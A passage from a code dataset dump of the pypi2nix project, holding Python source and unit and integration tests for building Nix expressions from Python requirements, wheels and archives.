archive(\n request, test_zip_path: str, test_tar_gz_path: str, test_tar_bz2_path: str\n) -> Archive:\n if request.param == \"tar\":\n return Archive(path=test_tar_gz_path)\n elif request.param == \"bz2\":\n return Archive(path=test_tar_bz2_path)\n else:\n return Archive(path=test_zip_path)\n\n\ndef test_that_we_can_inspect_the_content_of_an_archive(archive: Archive):\n with archive.extracted_files() as directory:\n files = tuple(os.listdir(directory))\n assert files == (\"test.txt\",)\n\n\ndef test_that_we_can_inspect_the_content_of_a_wheel(setupcfg_package_wheel_path: str):\n archive = Archive(path=setupcfg_package_wheel_path)\n with archive.extracted_files() as directory:\n assert \"setupcfg_package-1.0.dist-info\" in os.listdir(directory)\n" }, { "alpha_fraction": 0.6598557829856873, "alphanum_fraction": 0.671875, "avg_line_length": 19.799999237060547, "blob_id": "029ab5ba8012900d8b7f680f572cbbcc26b96709", "content_id": "1a7cbc02e6d61706c99363b703c32be13e1834c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 832, "license_type": "no_license", "max_line_length": 79, "num_lines": 40, "path": "/src/pypi2nix/pypi_release.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from enum import Enum\nfrom enum import unique\nfrom typing import Optional\n\nfrom attr import attrib\nfrom attr import attrs\n\n\n@unique\nclass ReleaseType(Enum):\n UNKNOWN = 0\n SOURCE = 1\n WHEEL = 2\n EGG = 3\n WIN_INSTALLER = 4\n RPM = 5\n MSI = 6\n\n\n_release_type_mapping = {\n \"sdist\": ReleaseType.SOURCE,\n \"bdist_wheel\": ReleaseType.WHEEL,\n \"bdist_egg\": ReleaseType.EGG,\n \"bdist_wininst\": ReleaseType.WIN_INSTALLER,\n \"bdist_rpm\": ReleaseType.RPM,\n \"bdist_msi\": ReleaseType.MSI,\n}\n\n\ndef get_release_type_by_packagetype(packagetype: str) -> Optional[ReleaseType]:\n return _release_type_mapping.get(packagetype)\n\n\n@attrs(frozen=True)\nclass PypiRelease:\n url: str = attrib()\n sha256_digest: str = attrib()\n version: str = attrib()\n type: ReleaseType = attrib()\n filename: str = attrib()\n" }, { "alpha_fraction": 0.7144535779953003, "alphanum_fraction": 0.7162162065505981, "avg_line_length": 30.518518447875977, "blob_id": "39efdb60e28fdedff99c8060c885daa3c6eb9cf3", "content_id": "2dd82849a5969445588290feedd6c2202b3b5c81", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1702, "license_type": "permissive", "max_line_length": 82, "num_lines": 54, "path": "/unittests/test_requirements_file.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements_file import RequirementsFile\n\n\n@pytest.fixture\ndef requirements_file_from_lines(\n project_dir, tmpdir_factory, requirement_parser, logger: Logger\n):\n def factory(lines):\n requirements_file = tmpdir_factory.mktemp(\"test\").join(\"requirements.txt\")\n requirements_file.write(\"\\n\".join(lines))\n return RequirementsFile(\n str(requirements_file), project_dir, requirement_parser, logger\n )\n\n return factory\n\n\ndef test_requirements_file_handles_comments(requirements_file_from_lines):\n requirements_file = requirements_file_from_lines([\"# comment\"])\n requirements_file.process()\n\n\ndef test_requirements_file_handles_empty_lines(requirements_file_from_lines):\n requirements_file = requirements_file_from_lines([\"\"])\n requirements_file.process()\n\n\ndef test_requirements_file_can_be_created_from_requirements_lines(\n project_dir: str, requirement_parser: RequirementParser, logger: Logger\n):\n RequirementsFile.from_lines(\n [\"pytest\"],\n requirement_parser=requirement_parser,\n project_dir=project_dir,\n logger=logger,\n )\n\n\ndef test_regular_requirements_stay_in_processed_file(\n project_dir: str, requirement_parser: RequirementParser, logger: Logger\n):\n requirement_file = RequirementsFile.from_lines(\n [\"pytest\"],\n requirement_parser=requirement_parser,\n project_dir=project_dir,\n logger=logger,\n )\n processed_file = requirement_file.processed_requirements_file_path()\n with open(processed_file) as f:\n assert \"pytest\" in f.read()\n" }, { "alpha_fraction": 0.6330221891403198, "alphanum_fraction": 0.6872811913490295, "avg_line_length": 33.62626266479492, "blob_id": "29cd5ee1c71a61f7dead9f0eb7d70a17df78bf26", "content_id": "0cd75fb4f2d11f8029ab1de2e0e856740800bab9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3428, "license_type": "permissive", "max_line_length": 127, "num_lines": 99, "path": "/unittests/test_network_file.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nimport tempfile\n\nimport pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.network_file import DiskTextFile\nfrom pypi2nix.network_file import GitTextFile\nfrom pypi2nix.network_file import NetworkFile\nfrom pypi2nix.network_file import UrlTextFile\nfrom pypi2nix.nix import Nix\n\nfrom .switches import nix\n\n\n@nix\ndef test_calculate_sha256_for_text_file(logger: Logger):\n test_file = UrlTextFile(\n url=\"https://raw.githubusercontent.com/nix-community/pypi2nix/6fe6265b62b53377b4677a39c6ee48550c1f2186/.gitignore\",\n logger=logger,\n name=\"testname\",\n )\n assert \"*.pyc\" in test_file.fetch()\n assert \"0b2s1lyfr12v83rrb69j1cfcsksisgwyzfl5mix6qz5ldxfww8p0\" == test_file.sha256\n\n\n@nix\ndef test_can_evaluate_expression_of_fetched_file(logger: Logger, nix: Nix) -> None:\n test_file = UrlTextFile(\n url=\"https://raw.githubusercontent.com/nix-community/pypi2nix/6fe6265b62b53377b4677a39c6ee48550c1f2186/.gitignore\",\n logger=logger,\n name=\"testname\",\n )\n nix.build_expression(\n expression=f\"let pkgs = import <nixpkgs> {{}}; in {test_file.nix_expression() }\"\n )\n\n\n@nix\ndef test_can_calculate_hash_for_git_files(logger: Logger):\n repository_url = \"https://github.com/nix-community/pypi2nix.git\"\n path = \".gitignore\"\n revision_name = \"e56cbbce0812359e80ced3d860e1f232323b2976\"\n network_file = GitTextFile(\n repository_url=repository_url,\n revision_name=revision_name,\n path=path,\n logger=logger,\n )\n\n assert network_file.sha256 == \"1vhdippb0daszp3a0m3zb9qcb25m6yib4rpggaiimg7yxwwwzyh4\"\n assert \"*.pyc\" in network_file.fetch()\n\n\n@nix\ndef test_can_evaluate_nix_expression(network_file: NetworkFile, nix: Nix):\n expression = f\"let pkgs = import <nixpkgs> {{}}; in {network_file.nix_expression()}\"\n nix.evaluate_expression(expression)\n\n\n@nix\ndef test_fetch_content_equals_file_content_from_nix_expression(\n network_file: NetworkFile, nix: Nix\n):\n fetch_content = network_file.fetch()\n\n nix_expression = \"with builtins;\"\n nix_expression += \"let pkgs = import <nixpkgs> {};\"\n nix_expression += f\"fileContent = readFile ({network_file.nix_expression()});\"\n nix_expression += \" in \"\n nix_expression += 'pkgs.writeTextFile { name = \"test\"; text = fileContent; }'\n with tempfile.TemporaryDirectory() as target_directory:\n target_file = os.path.join(target_directory, \"result\")\n nix.build_expression(nix_expression, out_link=target_file)\n with open(target_file) as f:\n nix_content = f.read()\n assert nix_content == fetch_content\n\n\n@pytest.fixture(params=[\"url\", \"git\", \"disk\"])\ndef network_file(logger: Logger, request, data_directory):\n if request.param == \"url\":\n return UrlTextFile(\n url=\"https://raw.githubusercontent.com/nix-community/pypi2nix/6fe6265b62b53377b4677a39c6ee48550c1f2186/.gitignore\",\n logger=logger,\n name=\"testname\",\n )\n elif request.param == \"disk\":\n return DiskTextFile(path=os.path.join(data_directory, \"test.txt\"),)\n else:\n repository_url = \"https://github.com/nix-community/pypi2nix.git\"\n path = \".gitignore\"\n revision_name = \"e56cbbce0812359e80ced3d860e1f232323b2976\"\n return GitTextFile(\n repository_url=repository_url,\n revision_name=revision_name,\n path=path,\n logger=logger,\n )\n" }, { "alpha_fraction": 0.6565113663673401, "alphanum_fraction": 0.6580047607421875, "avg_line_length": 39.09580993652344, "blob_id": "851abadca2c15cd75b7f2aebe0bf2532571e73d2", "content_id": "ba839f64ad33cde51d511faa6d5c7e655ae649b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6696, "license_type": "no_license", "max_line_length": 88, "num_lines": 167, "path": "/src/pypi2nix/wheel_builder.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import zipfile\nfrom copy import copy\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Set\n\nfrom pypi2nix.archive import Archive\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package import DistributionNotDetected\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.source_distribution import SourceDistribution\nfrom pypi2nix.target_platform import TargetPlatform\n\n\nclass WheelBuilder:\n def __init__(\n self,\n pip: Pip,\n download_directory: Path,\n wheel_directory: Path,\n extracted_wheel_directory: Path,\n lib_directory: Path,\n logger: Logger,\n requirement_parser: RequirementParser,\n target_platform: TargetPlatform,\n base_dependency_graph: DependencyGraph,\n ) -> None:\n self.pip = pip\n self._download_directory = download_directory\n self._wheel_directory = wheel_directory\n self._extracted_wheels_directory: Path = extracted_wheel_directory\n self.inspected_source_distribution_files: Set[Path] = set()\n self.target_platform = target_platform\n self.source_distributions: Dict[str, SourceDistribution] = dict()\n self.logger = logger\n self.requirement_parser = requirement_parser\n self.lib_directory = lib_directory\n self._dependency_graph = base_dependency_graph\n\n def build(\n self,\n requirements: RequirementSet,\n setup_requirements: Optional[RequirementSet] = None,\n ) -> List[str]:\n self.ensure_download_directory_exists()\n self._ensure_wheels_directory_exists()\n if not setup_requirements:\n setup_requirements = RequirementSet(self.target_platform)\n else:\n self.logger.info(\"Downloading setup requirements\")\n setup_requirements = (\n self.detect_additional_build_dependencies(setup_requirements)\n + setup_requirements\n )\n self.logger.info(\"Installing setup requirements\")\n self.pip.install(\n setup_requirements,\n target_directory=self.lib_directory,\n source_directories=[self._download_directory],\n )\n self.logger.info(\"Downloading runtime requirements\")\n requirements = requirements + setup_requirements\n detected_requirements = self.detect_additional_build_dependencies(requirements)\n updated_requirements = detected_requirements + requirements\n self.logger.info(\"Build wheels of setup and runtime requirements\")\n self.pip.build_wheels(\n updated_requirements, self._wheel_directory, [self._download_directory],\n )\n return self.extract_wheels()\n\n def detect_additional_build_dependencies(\n self, requirements: RequirementSet, constraints: Optional[RequirementSet] = None\n ) -> RequirementSet:\n if constraints is None:\n constraints = RequirementSet(self.target_platform)\n self.pip.download_sources(\n requirements + constraints.to_constraints_only(), self._download_directory,\n )\n uninspected_distributions = self.get_uninspected_source_distributions()\n self.register_all_source_distributions()\n detected_dependencies = RequirementSet(self.target_platform)\n if not uninspected_distributions:\n return detected_dependencies\n for distribution in uninspected_distributions:\n detected_dependencies += self._get_build_dependencies_for_distribution(\n distribution\n )\n return detected_dependencies + self.detect_additional_build_dependencies(\n detected_dependencies,\n constraints=(requirements + constraints).to_constraints_only(),\n )\n\n def _get_build_dependencies_for_distribution(\n self, distribution: SourceDistribution\n ) -> RequirementSet:\n self.source_distributions[distribution.name] = distribution\n build_dependencies = distribution.build_dependencies(\n self.target_platform\n ).filter(lambda requirement: requirement.name() not in [distribution.name])\n for dependency in build_dependencies:\n self._dependency_graph.set_buildtime_dependency(\n dependent=distribution.to_loose_requirement(), dependency=dependency\n )\n return build_dependencies\n\n def get_uninspected_source_distributions(self) -> List[SourceDistribution]:\n archives = [\n Archive(path=str(path))\n for path in self._download_directory.list_files()\n if path not in self.inspected_source_distribution_files\n ]\n distributions = list()\n for archive in archives:\n try:\n distribution = SourceDistribution.from_archive(\n archive, self.logger, requirement_parser=self.requirement_parser\n )\n except DistributionNotDetected:\n continue\n distributions.append(distribution)\n return distributions\n\n def register_all_source_distributions(self) -> None:\n for path in self._download_directory.list_files():\n self.inspected_source_distribution_files.add(path)\n\n def extract_wheels(self) -> List[str]:\n self.ensure_extracted_wheels_directory_exists()\n\n wheels = [\n str(file_path)\n for file_path in self._wheel_directory.list_files()\n if file_path.is_file() and str(file_path).endswith(\".whl\")\n ]\n for wheel in wheels:\n zip_file = zipfile.ZipFile(wheel)\n try:\n zip_file.extractall(str(self._extracted_wheels_directory))\n finally:\n zip_file.close()\n\n return [\n str(dist_info)\n for dist_info in self._extracted_wheels_directory.list_files()\n if str(dist_info).endswith(\".dist-info\")\n ]\n\n def get_frozen_requirements(self) -> str:\n return self.pip.freeze(python_path=[self._extracted_wheels_directory])\n\n def ensure_download_directory_exists(self) -> None:\n self._download_directory.ensure_directory()\n\n def ensure_extracted_wheels_directory_exists(self) -> None:\n self._extracted_wheels_directory.ensure_directory()\n\n def _ensure_wheels_directory_exists(self) -> None:\n self._wheel_directory.ensure_directory()\n\n @property\n def dependency_graph(self) -> DependencyGraph:\n return copy(self._dependency_graph)\n" }, { "alpha_fraction": 0.6030107140541077, "alphanum_fraction": 0.6047559976577759, "avg_line_length": 35.669334411621094, "blob_id": "9d22875600a36ec5f1537efca8d8ac26422ac391", "content_id": "364fb83589887cd581d7e56bb1c3723644aa0ff9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13751, "license_type": "no_license", "max_line_length": 86, "num_lines": 375, "path": "/integrationtests/framework.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nimport shutil\nimport subprocess\nimport sys\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom unittest import TestCase\n\nimport yaml\nfrom attr import attrib\nfrom attr import attrs\nfrom attr import evolve\n\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.memoize import memoize\nfrom pypi2nix.nix import EvaluationFailed\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.requirement_parser import RequirementParser\n\nHERE = os.path.dirname(__file__)\n\n\nclass IntegrationTest(TestCase):\n \"\"\"Methods to implement for a valid test case:\n\n name_of_testcase\n requirements\n\n optional:\n\n setup_requires() -- default: []\n executables_for_testing() -- default: []\n extra_environment() -- default: dict()\n external_dependencies\n requirements_file_check(content) -- default: (lambda content: None)\n constraints\n code_for_testing\n python_version\n code_for_testing_filename\n explicit_build_directory\n dependencyGraph -- default {}: yaml that will be used as input for pypi2nix\n\n check_dependency_graph(\n self,\n dependency_graph: DependencyGraph,\n requirement_parser: RequirementParser\n ):\n Override this function in your test case to perform checks on the\n dependency graph information that pypi2nix renders. You can use\n the requirement_parser supplied though the method argument to\n generate Requirement objects. For example::\n django = requirement_parser.parse('django')\n pytz = requirement_parser.parse('pytz')\n\n If we wanted to check that pypi2nix detected the dependency of django\n on the pytz package than we could do it the following way:\n self.assertTrue(\n dependency_graph.is_runtime_dependency(\n dependent=django,\n dependency=pytz,\n )\n )\n \"\"\"\n\n def setUp(self) -> None:\n self.logger = StreamLogger(output=sys.stdout)\n self.nix = Nix(logger=self.logger)\n self.assertNotEqual(self.name_of_testcase, \"undefined\")\n self.requirement_parser = RequirementParser(self.logger)\n\n def test_build_example(self) -> None:\n self.build_pypi2nix()\n self.generate_requirements_file()\n self.build_nix_expression()\n self.check_requirements_file_content()\n self.run_expression_tests()\n self.run_dependency_graph_tests()\n\n def build_pypi2nix(self) -> None:\n print(\"Build pypi2nix executable\")\n try:\n self.nix.build(\n os.path.join(os.path.dirname(HERE), \"default.nix\"),\n out_link=os.path.join(HERE, \"pypi2nix\"),\n )\n except EvaluationFailed:\n self.fail(\"Could not build pypi2nix executable\")\n\n def generate_requirements_file(self) -> None:\n print(\"Generate requirements.txt\")\n requirements_file_content = self.generate_requirements_file_content()\n self.write_requirements_file(requirements_file_content)\n\n def build_nix_expression(self) -> None:\n print(\"Build nix expression\")\n if self.explicit_build_directory:\n self.prepare_build_directory()\n process = subprocess.Popen(\n self.build_nix_expression_command(),\n cwd=self.example_directory(),\n env=self.nix_build_env(),\n stdin=subprocess.DEVNULL,\n )\n process.communicate()\n if process.returncode != 0:\n self.fail(\n \"Could not build nix expression for {testname}\".format(\n testname=self.name_of_testcase\n )\n )\n\n def build_nix_expression_command(self) -> List[str]:\n command = [\n os.path.join(HERE, \"pypi2nix\", \"bin\", \"pypi2nix\"),\n \"-vvv\",\n \"-V\",\n self.python_version,\n \"-r\",\n \"requirements.txt\",\n \"--default-overrides\",\n \"--dependency-graph-input\",\n self.rendered_dependency_graph(),\n \"--dependency-graph-output\",\n self._dependency_graph_output_path(),\n ]\n for requirement in self.setup_requires():\n command.append(\"-s\")\n command.append(requirement)\n for variable_name, value in self.extra_environment().items():\n command.append(\"-N\")\n command.append(\"{name}={value}\".format(name=variable_name, value=value))\n for dependency in self.external_dependencies:\n command.append(\"-E\")\n command.append(dependency)\n if self.explicit_build_directory:\n command.append(\"--build-directory\")\n command.append(self.build_directory())\n return command\n\n def setup_requires(self) -> List[str]:\n return []\n\n def check_requirements_file_content(self) -> None:\n requirements_file_content = self.read_requirements_file_contents()\n self.requirements_file_check(requirements_file_content)\n\n def run_expression_tests(self) -> None:\n self.build_interpreter_from_generated_expression()\n self.build_additional_attributes()\n self.run_interpreter_with_test_code()\n self.run_executable_tests()\n\n def run_dependency_graph_tests(self) -> None:\n dependency_graph = self._read_dependency_graph()\n self.check_dependency_graph(dependency_graph, self.requirement_parser)\n\n def build_interpreter_from_generated_expression(self) -> None:\n print(\"Build python interpreter from generated expression\")\n try:\n self.nix.build(\n os.path.join(self.example_directory(), \"requirements.nix\"),\n attribute=\"interpreter\",\n out_link=os.path.join(self.example_directory(), \"result\"),\n )\n except EvaluationFailed:\n self.fail(\n \"Failed to build python interpreter from nix expression generated\"\n )\n\n def build_additional_attributes(self) -> None:\n for additional_path in self.additional_paths_to_build:\n try:\n self.nix.evaluate_file(\n os.path.join(self.example_directory(), \"requirements.nix\"),\n attribute=additional_path,\n )\n except EvaluationFailed:\n self.fail(f\"Failed to build attribute path {additional_path}\")\n\n def run_interpreter_with_test_code(self) -> None:\n if self.code_for_testing_string():\n test_code = self.code_for_testing_string()\n self.run_interpreter_with_test_code_from_result(test_code)\n self.run_interpreter_with_test_code_in_nix_shell(test_code)\n\n def run_interpreter_with_test_code_from_result(self, test_code: str) -> None:\n print(\"Run generated interpreter with test code\")\n process = subprocess.Popen(\n [os.path.join(self.example_directory(), \"result\", \"bin\", \"python\")],\n stdin=subprocess.PIPE,\n )\n process.communicate(input=test_code.encode())\n if process.returncode != 0:\n self.fail(\"Executation of test code failed\")\n\n def run_interpreter_with_test_code_in_nix_shell(self, test_code: str) -> None:\n print(\"Execute test code in nix-shell\")\n test_command_line = [\n \"nix\",\n \"run\",\n \"--show-trace\",\n \"-f\",\n os.path.join(self.example_directory(), \"requirements.nix\"),\n \"interpreter\",\n \"--command\",\n \"python\",\n ]\n process = subprocess.Popen(\n test_command_line,\n cwd=os.path.join(self.example_directory(), \"result\", \"bin\"),\n env=self.nix_build_env(),\n stdin=subprocess.PIPE,\n )\n process.communicate(input=test_code.encode())\n if process.returncode != 0:\n self.fail(\"Executation of test code in nix-shell failed\")\n\n def read_requirements_file_contents(self) -> str:\n with open(os.path.join(self.example_directory(), \"requirements.nix\")) as f:\n return f.read()\n\n def code_for_testing_string(self) -> str:\n if self.code_for_testing and self.code_for_testing_filename:\n self.fail(\n \"Cannot set `both code_for_testing` and `code_for_testing_filename`.\"\n )\n if self.code_for_testing:\n return \"\\n\".join(self.code_for_testing)\n elif self.code_for_testing_filename:\n with open(\n os.path.join(self.example_directory(), self.code_for_testing_filename)\n ) as f:\n return f.read()\n else:\n return \"\"\n\n code_for_testing: List[str] = []\n code_for_testing_filename: Optional[str] = None\n\n def extra_environment(self) -> Dict[str, str]:\n return dict()\n\n def run_executable_tests(self) -> None:\n for test_command in self.executables_for_testing():\n self.run_test_command_in_shell(test_command)\n self.run_test_command_from_build_output(test_command)\n\n def run_test_command_in_shell(self, test_command: \"TestCommand\") -> None:\n print(\"Run {command} in nix-shell\".format(command=test_command))\n test_command_line = [\n \"nix\",\n \"run\",\n \"--show-trace\",\n \"-f\",\n os.path.join(self.example_directory(), \"requirements.nix\"),\n \"interpreter\",\n \"--command\",\n ] + test_command.command\n process = subprocess.Popen(\n test_command_line,\n cwd=os.path.join(self.example_directory(), \"result\", \"bin\"),\n env=dict(self.nix_build_env(), **test_command.env),\n )\n process.communicate()\n print() # for empty line after command output\n if process.returncode != 0:\n self.fail(\n \"Tested executable `{command}` returned non-zero exitcode.\".format(\n command=test_command\n )\n )\n\n def run_test_command_from_build_output(self, test_command: \"TestCommand\") -> None:\n prepared_test_command = evolve(\n test_command,\n command=[\"./\" + test_command.command[0]] + test_command.command[1:],\n )\n print(\"Run {command}\".format(command=prepared_test_command))\n process = subprocess.Popen(\n prepared_test_command.command,\n cwd=os.path.join(self.example_directory(), \"result\", \"bin\"),\n env=dict(self.nix_build_env(), **prepared_test_command.env),\n )\n process.communicate()\n print() # for empty line after command output\n if process.returncode != 0:\n self.fail(\n \"Tested executable `{command}` returned non-zero exitcode.\".format(\n command=test_command\n )\n )\n\n def executables_for_testing(self) -> List[\"TestCommand\"]:\n return []\n\n def nix_build_env(self) -> Dict[str, str]:\n environment_variables = dict(os.environ)\n del environment_variables[\"PYTHONPATH\"]\n return environment_variables\n\n def generate_requirements_file_content(self) -> str:\n if self.constraints:\n self.generate_constraints_txt()\n requirements_txt_extra_content = [\"-c \" + self.constraints_txt_path()]\n else:\n requirements_txt_extra_content = []\n return \"\\n\".join(self.requirements + requirements_txt_extra_content)\n\n def generate_constraints_txt(self) -> None:\n with open(self.constraints_txt_path(), \"w\") as f:\n f.write(\"\\n\".join(self.constraints))\n\n def constraints_txt_path(self) -> str:\n return os.path.join(self.example_directory(), \"constraints.txt\")\n\n def write_requirements_file(self, content: str) -> None:\n os.makedirs(os.path.dirname(self.requirements_file_path()), exist_ok=True)\n with open(self.requirements_file_path(), \"w\") as f:\n f.write(content)\n\n def requirements_file_path(self) -> str:\n return os.path.join(self.example_directory(), \"requirements.txt\")\n\n def example_directory(self) -> str:\n return os.path.join(HERE, self.name_of_testcase)\n\n def requirements_file_check(self, _: str) -> None:\n pass\n\n def _dependency_graph_output_path(self) -> str:\n return os.path.join(self.example_directory(), \"dependency-graph.yml\")\n\n def build_directory(self):\n return os.path.join(self.example_directory(), \"build\")\n\n def prepare_build_directory(self):\n if os.path.exists(self.build_directory()):\n shutil.rmtree(self.build_directory())\n os.makedirs(self.build_directory())\n\n def check_dependency_graph(\n self, dependency_graph: DependencyGraph, requirement_parser: RequirementParser\n ):\n pass\n\n def _read_dependency_graph(self) -> DependencyGraph:\n with open(self._dependency_graph_output_path()) as f:\n return DependencyGraph.deserialize(f.read())\n\n constraints: List[str] = []\n python_version: str = \"python3\"\n requirements: List[str] = []\n name_of_testcase: str = \"undefined\"\n external_dependencies: List[str] = []\n explicit_build_directory: bool = False\n additional_paths_to_build: List[str] = []\n dependency_graph: Dict[str, Dict[str, List[str]]] = {}\n\n @memoize\n def rendered_dependency_graph(self) -> str:\n path = os.path.join(self.example_directory(), \"dependency-input.yml\")\n with open(path, \"w\") as f:\n yaml.dump(\n self.dependency_graph, f,\n )\n return path\n\n\n@attrs\nclass TestCommand:\n command: List[str] = attrib()\n env: Dict[str, str] = attrib(default=dict())\n" }, { "alpha_fraction": 0.7217556834220886, "alphanum_fraction": 0.7269062995910645, "avg_line_length": 33.88671875, "blob_id": "6e7cc00e5fd900d831bda79e37aeb47a490232a0", "content_id": "418eafd43fc3032cbfa3a378d13c6365798d8514", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8931, "license_type": "permissive", "max_line_length": 88, "num_lines": 256, "path": "/unittests/test_requirement_set.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.requirements import VersionRequirement\nfrom pypi2nix.requirements_file import RequirementsFile\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import TargetPlatform\n\n\n@pytest.fixture\ndef requirement_set(current_platform):\n return RequirementSet(current_platform)\n\n\ndef test_length_of_empty_requirement_set_is_0(current_platform):\n assert len(RequirementSet(current_platform)) == 0\n\n\ndef test_length_is_one_after_adding_one_requirement(\n current_platform, requirement_parser\n):\n requirement_set = RequirementSet(current_platform)\n requirement_set.add(requirement_parser.parse(\"pypi2nix\"))\n assert len(requirement_set) == 1\n\n\ndef test_length_is_one_after_adding_same_requirement_twice(\n current_platform, requirement_parser\n):\n requirement_set = RequirementSet(current_platform)\n requirement_set.add(requirement_parser.parse(\"pypi2nix\"))\n requirement_set.add(requirement_parser.parse(\"pypi2nix\"))\n assert len(requirement_set) == 1\n\n\ndef test_to_file_outputs_a_requirements_file_object(\n project_dir, current_platform, requirement_parser, logger: Logger\n):\n assert isinstance(\n RequirementSet(current_platform).to_file(\n project_dir, current_platform, requirement_parser, logger\n ),\n RequirementsFile,\n )\n\n\ndef test_sources_contains_a_source_per_git_requirement(\n current_platform, requirement_parser\n):\n requirement_set = RequirementSet(current_platform)\n requirement_set.add(requirement_parser.parse(\"no-git-source\"))\n requirement_set.add(\n requirement_parser.parse(\"git+https://url.test/path#egg=test-egg\")\n )\n assert len(requirement_set.sources()) == 1\n\n\ndef test_versions_add_if_same_requirement_is_added_twice(\n current_platform, requirement_parser\n):\n requirement_set = RequirementSet(current_platform)\n requirement_set.add(requirement_parser.parse(\"pypi2nix <= 2.0\"))\n requirement_set.add(requirement_parser.parse(\"pypi2nix >= 1.9\"))\n requirement = requirement_set.requirements[\"pypi2nix\"]\n assert isinstance(requirement, VersionRequirement)\n assert len(requirement.version()) == 2\n\n\ndef test_from_file_handles_empty_lines(\n project_dir, current_platform, requirement_parser, logger: Logger\n):\n requirements_file = RequirementsFile.from_lines(\n [\"pypi2nix\", \"\"], project_dir, requirement_parser, logger\n )\n requirements_set = RequirementSet.from_file(\n requirements_file, current_platform, requirement_parser, logger\n )\n assert len(requirements_set) == 1\n\n\ndef test_from_file_handles_comment_lines(\n project_dir, current_platform, requirement_parser, logger: Logger\n):\n requirements_file = RequirementsFile.from_lines(\n [\"pypi2nix\", \"# comment\"], project_dir, requirement_parser, logger\n )\n requirements_set = RequirementSet.from_file(\n requirements_file, current_platform, requirement_parser, logger\n )\n assert len(requirements_set) == 1\n\n\ndef test_sources_has_sources_type(current_platform):\n requirement_set = RequirementSet(current_platform)\n assert isinstance(requirement_set.sources(), Sources)\n\n\ndef test_adding_two_empty_sets_results_in_an_empty_set(current_platform):\n requirements = RequirementSet(current_platform) + RequirementSet(current_platform)\n assert len(requirements) == 0\n\n\ndef test_can_find_requirement_in_requirement_set(current_platform, requirement_parser):\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"pypi2nix\"))\n assert \"pypi2nix\" in requirements\n\n\ndef test_cannot_find_name_in_empty_requirement_set(current_platform):\n assert \"test\" not in RequirementSet(current_platform)\n\n\ndef test_elements_from_both_sets_can_be_found_in_sum_of_sets(\n current_platform, requirement_parser\n):\n left = RequirementSet(current_platform)\n left.add(requirement_parser.parse(\"test1\"))\n right = RequirementSet(current_platform)\n right.add(requirement_parser.parse(\"test2\"))\n sum = left + right\n assert \"test1\" in sum\n assert \"test2\" in sum\n\n\ndef test_requirement_set_respects_constraints_when_reading_from_requirement_file(\n tmpdir, project_dir, current_platform, requirement_parser, logger: Logger\n):\n requirements_txt = tmpdir.join(\"requirements.txt\")\n constraints_txt = tmpdir.join(\"constraints.txt\")\n with open(requirements_txt, \"w\") as f:\n print(\"test-requirement\", file=f)\n print(\"-c \" + str(constraints_txt), file=f)\n with open(constraints_txt, \"w\") as f:\n print(\"test-requirement <= 1.0\", file=f)\n\n original_requirements_file = RequirementsFile(\n str(requirements_txt), project_dir, requirement_parser, logger\n )\n original_requirements_file.process()\n\n requirement_set = RequirementSet.from_file(\n original_requirements_file, current_platform, requirement_parser, logger\n )\n\n new_requirements_file = requirement_set.to_file(\n project_dir, current_platform, requirement_parser, logger\n )\n\n assert \"test-requirement <= 1.0\" in new_requirements_file.read()\n\n\ndef test_constraints_without_requirement_will_not_show_up_in_generated_requirement_file(\n tmpdir, project_dir, current_platform, requirement_parser, logger: Logger\n):\n requirements_txt = tmpdir.join(\"requirements.txt\")\n constraints_txt = tmpdir.join(\"constraints.txt\")\n\n with open(requirements_txt, \"w\") as f:\n print(\"test-requirement\", file=f)\n print(\"-c \" + str(constraints_txt), file=f)\n with open(constraints_txt, \"w\") as f:\n print(\"test-constraint == 1.0\", file=f)\n\n original_requirements_file = RequirementsFile(\n str(requirements_txt), project_dir, requirement_parser, logger\n )\n original_requirements_file.process()\n\n requirement_set = RequirementSet.from_file(\n original_requirements_file, current_platform, requirement_parser, logger\n )\n\n new_requirements_file = requirement_set.to_file(\n project_dir, current_platform, requirement_parser, logger\n )\n\n assert \"test-constraint\" not in new_requirements_file.read()\n\n\ndef test_include_lines_are_respected_when_generating_from_file(\n tmpdir, project_dir, current_platform, requirement_parser, logger: Logger\n):\n requirements_txt = tmpdir.join(\"requirements.txt\")\n included_requirements_txt = tmpdir.join(\"included_requirements.txt\")\n\n with open(requirements_txt, \"w\") as f:\n print(\"-r \" + str(included_requirements_txt), file=f)\n with open(included_requirements_txt, \"w\") as f:\n print(\"test-requirement\", file=f)\n requirements_file = RequirementsFile(\n str(requirements_txt), project_dir, requirement_parser, logger\n )\n requirements_file.process()\n requirement_set = RequirementSet.from_file(\n requirements_file, current_platform, requirement_parser, logger\n )\n\n assert \"test-requirement\" in 